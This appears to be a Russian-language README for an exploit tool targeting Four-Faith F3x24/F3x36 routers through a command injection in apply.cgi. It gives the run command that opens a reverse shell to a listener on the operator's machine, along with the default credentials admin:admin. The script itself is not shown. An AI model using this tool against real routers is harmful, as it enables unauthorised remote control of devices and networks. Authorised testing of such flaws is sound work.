
Эксплойт для маршрутизаторов Four-Faith для получения обратной оболочки
Это эксплойт для маршрутизаторов Four-Faith моделей F3x24 и F3x36, позволяющий получить reverse shell.
«Маршрутизаторы Four-Faith моделей F3x24 и F3x36 подвержены уязвимости внедрения команд операционной системы (OS). По крайней мере, версия прошивки 2.0 позволяет аутентифицированным и удалённым злоумышленникам выполнять произвольные команды ОС через HTTP при изменении системного времени через apply.cgi. Кроме того, эта версия прошивки имеет учётные данные по умолчанию, которые, если их не изменить, фактически превращают эту уязвимость в неаутентифицированное и удалённое выполнение команд ОС.»
Источник: nist.gov
Этот скрипт основан на полезной нагрузке, обнаруженной VulnCheck
Перед запуском эксплойта запустите TCP-сервер на вашей машине.
Затем выполните
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
Где
RHOST — удалённый IP-адрес. Также можно указать домен.LHOST — IP-адрес вашего TCP-сервера на вашей машине.LPORT — порт вашего TCP-сервера.USERNAME и PASSWORD — учётные данные маршрутизатора. По умолчанию admin:admin.RPORT — удалённый порт маршрутизатора. По умолчанию 80.Убедитесь, что используете этот эксплойт только для тестирования и в авторизованных средах.
Никогда не используйте его в злонамеренных целях.